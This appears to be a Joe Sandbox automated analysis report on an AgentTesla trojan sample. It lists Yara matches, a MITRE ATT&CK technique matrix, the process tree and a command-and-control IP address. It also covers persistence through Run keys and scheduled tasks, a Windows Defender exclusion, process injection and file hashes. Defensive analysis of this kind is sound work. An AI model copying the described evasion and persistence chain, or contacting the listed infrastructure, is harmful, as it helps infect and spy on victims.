              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.28.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.28.dr | Binary or memory string: msmpeng.exe
              Source: Amcache.hve.28.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.28.dr | Binary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 6912, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: grjujyNaBLaKbU.exe PID: 7400, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 6912, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: grjujyNaBLaKbU.exe PID: 7400, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR

              MITRE ATT&CK Matrix (techniques listed per tactic; bracketed numbers are the hit counts shown on the report's matrix)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: Windows Management Instrumentation [1]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: Process Injection [112]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [31]; Process Injection [112]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [22]; DLL Side-Loading [1]
              Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: Security Software Discovery [121]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; Remote System Discovery; System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: Input Capture [1]; Archive Collected Data [11]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Application Layer Protocol [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Behavior Graph ID: 1562040; Sample: 9758xBqgE1azKnB.exe; Start date: 25/11/2024; Architecture: WINDOWS; Score: 100
              Signatures attached to the start node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
              Process tree recovered from the behavior graph (dropped files, network contacts and per-process signatures listed under the process they belong to):
              • 9758xBqgE1azKnB.exe (started)
                Dropped: C:\Users\user\AppData\...\grjujyNaBLaKbU.exe (PE32); C:\...\grjujyNaBLaKbU.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpAD87.tmp (XML); C:\Users\user\...\9758xBqgE1azKnB.exe.log (ASCII)
                Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                • 9758xBqgE1azKnB.exe (started)
                  Network: 18.181.154.24, 49735, 7000, AMAZON-02US, United States
                  Dropped: C:\Users\user\AppData\...\9758xBqgE1azKnB.exe (PE32)
                  Signature: Protects its processes via BreakOnTermination flag
                  • WerFault.exe (started)
                • powershell.exe (started)
                  Signature: Loading BitLocker PowerShell Module
                  • WmiPrvSE.exe (started)
                  • conhost.exe (started)
                • schtasks.exe (started)
                  • conhost.exe (started)
                • 9758xBqgE1azKnB.exe (started)
              • grjujyNaBLaKbU.exe (started)
                Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                • schtasks.exe (started)
                  • conhost.exe (started)
                • 2 other processes
              • 9758xBqgE1azKnB.exe (started)
                • schtasks.exe (started)
                  • conhost.exe (started)
                • 9758xBqgE1azKnB.exe (started)
              • 9758xBqgE1azKnB.exe (started)
                • 2 other processes
                  • conhost.exe (started)

              Source | Detection | Scanner | Label
              9758xBqgE1azKnB.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
              9758xBqgE1azKnB.exe | 55% | Virustotal | -
              9758xBqgE1azKnB.exe | 100% | Joe Sandbox ML | -
              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | 100% | Joe Sandbox ML | -
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | 100% | Joe Sandbox ML | -
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | 55% | Virustotal | -
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | 55% | Virustotal | -
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              18.181.154.24 | 0% | Avira URL Cloud | safe
              No contacted domains info
              Name | Malicious | Antivirus Detection | Reputation
              18.181.154.24 | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              (Unless a different source is given, the source is 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmp; no row has an antivirus detection.)
              http://www.apache.org/licenses/LICENSE-2.0 | false | high
              http://www.fontbureau.com | false | high
              http://www.fontbureau.com/designersG | false | high
              http://www.fontbureau.com/designers/? | false | high
              http://www.founder.com.cn/cn/bThe | false | high
              http://www.fontbureau.com/designers? | false | high
              http://www.tiro.com | false | high
              http://upx.sf.net | source: Amcache.hve.28.dr | false | high
              http://www.fontbureau.com/designers | false | high
              http://www.goodfont.co.kr | false | high
              http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources | source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr | false | high
              http://www.carterandcone.coml | false | high
              http://www.sajatypeworks.com | false | high
              http://www.typography.netD | false | high
              http://www.fontbureau.com/designers/cabarga.htmlN | false | high
              http://www.founder.com.cn/cn/cThe | false | high
              http://www.galapagosdesign.com/staff/dennis.htm | false | high
              http://www.founder.com.cn/cn | false | high
              http://www.fontbureau.com/designers/frere-user.html | false | high
              http://www.jiyu-kobo.co.jp/ | false | high
              http://www.galapagosdesign.com/DPlease | false | high
              http://www.fontbureau.com/designers8 | false | high
              http://www.fonts.com | false | high
              http://www.sandoll.co.kr | false | high
              http://www.urwpp.deDPlease | false | high
              http://www.zhongyicts.com.cn | false | high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp; 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp; grjujyNaBLaKbU.exe, 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp; 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp; 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002479000.00000004.00000800.00020000.00000000.sdmp | false | high
              http://www.sakkal.com | false | high
              IP | Domain | Country | ASN | ASN Name | Malicious
              18.181.154.24 | unknown | United States | 16509 | AMAZON-02US | true
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1562040
              Start date and time: 2024-11-25 06:24:05 +01:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 9m 53s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 29
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Critical Process Termination
              Sample name: 9758xBqgE1azKnB.exe
              Detection: MAL
              Classification: mal100.troj.spyw.evad.winEXE@33/21@0/1
              EGA Information:
              • Successful, ratio: 62.5%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 469
              • Number of non-executed functions: 12
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target 9758xBqgE1azKnB.exe, PID 7700 because it is empty
              • Execution Graph export aborted for target 9758xBqgE1azKnB.exe, PID 8080 because it is empty
              • Execution Graph export aborted for target grjujyNaBLaKbU.exe, PID 7400 because it is empty
              • Not all processes were analyzed; the report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              Time | Type | Description
              00:24:57 | API Interceptor | 6718413x Sleep call for process: 9758xBqgE1azKnB.exe modified
              00:24:58 | API Interceptor | 12x Sleep call for process: powershell.exe modified
              00:24:59 | API Interceptor | 3x Sleep call for process: grjujyNaBLaKbU.exe modified
              05:24:59 | Task Scheduler | Run new task: grjujyNaBLaKbU path: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
              05:25:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnB C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
              05:25:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnB C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
              05:25:18 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk
                                                                      No context
                                                                      No context
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              (Match for all rows: AMAZON-02US; the SHA 256 and browse columns were links in the original and are not reproduced.)
              file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 18.239.168.24
              file.exe | malicious | Credential Flusher | 108.158.75.108
              file.exe | malicious | Amadey, Stealc, Vidar | 3.167.152.14
              https://clever-photos-686127.framer.app/ | malicious | Unknown | 108.158.75.21
              bin.sh.elf | malicious | Mirai | 54.171.230.55
              apep.mpsl.elf | malicious | Mirai | 54.183.101.83
              apep.spc.elf | malicious | Mirai | 52.65.67.33
              apep.m68k.elf | malicious | Unknown | 18.183.72.200
              apep.arm6.elf | malicious | Mirai | 18.183.140.68
              apep.sh4.elf | malicious | Mirai | 54.110.214.164
                                                                      No context
                                                                      No context
              Process: C:\Windows\SysWOW64\WerFault.exe
              File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category: dropped
              Size (bytes): 65536
              Entropy (8bit): 1.2422724671372962
              Encrypted: false
              SSDEEP: 192:w4V/vApeM0BU/Ka67Pf4nv5zuiF8Z24IO8/4Yyt:wQvApeHBU/Ka+Yv5zuiF8Y4IO8/ly
              MD5: 9503D1308C956667B86BECAEFF5C9607
              SHA1: CAA9E63716080119CA92C8458AE845AFFB9E1E10
              SHA-256: AFF8FAE40097EFF2D0A07B6227BF8264BDA3FA1D7A41F32D6CAE8FD49187F29C
              SHA-512: 74AFEAD525FEDE602D7537D49F849EEAABF8892C585A7FB4F5C5C7B8D2E21EF621B58A1B57F427FDB226715D2328F1A98539B809F736F3B7058B645013515BBF
              Malicious: false
              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.9.8.6.1.1.0.4.3.9.0.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.f.e.e.1.d.c.-.3.5.1.3.-.4.5.6.1.-.b.2.2.d.-.7.d.6.1.e.2.4.2.a.0.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.f.3.d.f.4.e.-.1.e.5.0.-.4.8.3.8.-.b.3.6.9.-.a.2.8.1.4.1.0.b.5.6.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.H.w.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.4.-.f.4.3.1.-.5.1.5.e.f.a.3.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.c.7.b.2.6.5.b.0.d.8.e.a.9.2.d.a.8.9.7.6.9.d.0.f.a.3.5.0.c.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.f.f.b.e.2.8.4.7.5.9.0.e.8.7.6.8.9.2.b.4.1.5.8.5.7.8.4.b.4.0.1.4.4.c.2.2.4.1.6.0.!.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
              Process: C:\Windows\SysWOW64\WerFault.exe
              File Type: Mini DuMP crash report, 15 streams, Mon Nov 25 05:28:30 2024, 0x1205a4 type
              Category: dropped
              Size (bytes): 360875
              Entropy (8bit): 3.5765657308219025
              Encrypted: false
              SSDEEP: 3072:VrwE59WqFylhH5y6/tpM4uEqscAzhAP1uILTgP6:VriqFy7HActS4wAzhx+TgP
              MD5: 387F8379D4618D1678CCD5BCDD14552A
              SHA1: 2C42FC30799BC7951B590D9CA7CA7831E4C4E5BC
              SHA-256: AF9DD30A706A712D8241A5BE0D167713F614F500C33148419C41E627F2F9E56B
              SHA-512: B6891418435DDFB262C160C61B26E2FE54A230317017B9AB871545815C9B73EF06965B7CA26A9281B2608E15A671A53BC9ECC954B8A8D35A3B6C98566AAF4E05
              Malicious: false
              Preview: MDMP..a..... .........Dg............4...........0"..H.......$...x,.......,...k..........`.......8...........T............I...8...........,..........................................................................................eJ...... /......GenuineIntel............T...........*.Dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process: C:\Windows\SysWOW64\WerFault.exe
              File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category: dropped
              Size (bytes): 6540
              Entropy (8bit): 3.718426231809118
              Encrypted: false
              SSDEEP: 192:R6l7wVeJSk6QsYk4jO4kYprM89bNxsf05Pm:R6lXJx6DYkj4kMNqfF
              MD5: 798CF570A02E023026EE083EB109FD37
              SHA1: E3899D163A01D45B237ECDE51B85E5E987F87B19
              SHA-256: 977A50D956FFE5F57D38D28ECFF2C415B616F12C6A30D4760FC5C1FFE2110034
              SHA-512: FE07C0CD73FB0D0CBF329CDC72BD14D534B0B8FAEA85BFE017F842DE8586F13B5F25AF064BA53C44D71D9FD28299A072217BDDBA1223AD49DBE17A83EFEB1F29
              Malicious: false
              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.
              Process: C:\Windows\SysWOW64\WerFault.exe
              File Type: XML 1.0 document, ASCII text, with CRLF line terminators
              Category: dropped
              Size (bytes): 4888
              Entropy (8bit): 4.486273295770891
              Encrypted: false
              SSDEEP: 48:cvIwWl8zsOJg77aI90fWpW8VYiYm8M4Jt3FF+q8vRItS3975wd:uIjfEI72O7VWJ9K+S3975wd
              MD5: 2C3EE5D70B401041468C06CCE02ED104
              SHA1: EA25A2427EE460CB8D8926CA0243729026237023
              SHA-256: 1A91E3B66D9BDC7602AD46BCBE362728151667362F24030D5BA39EB8073D07B5
              SHA-512: 5D347CBD96DCCBDF08A6B75B272AA27FB0E157BD95AF34FC8D773F70EC74587DCE12197290C4015077A80D50E0E752AE3932D5EF22911CE5FD728C213735D1D1
              Malicious: false
              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="603151" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process: C:\Users\user\Desktop\9758xBqgE1azKnB.exe
              File Type: ASCII text, with CRLF line terminators
              Category: dropped
              Size (bytes): 1216
              Entropy (8bit): 5.34331486778365
              Encrypted: false
              SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5: 1330C80CAAC9A0FB172F202485E9B1E8
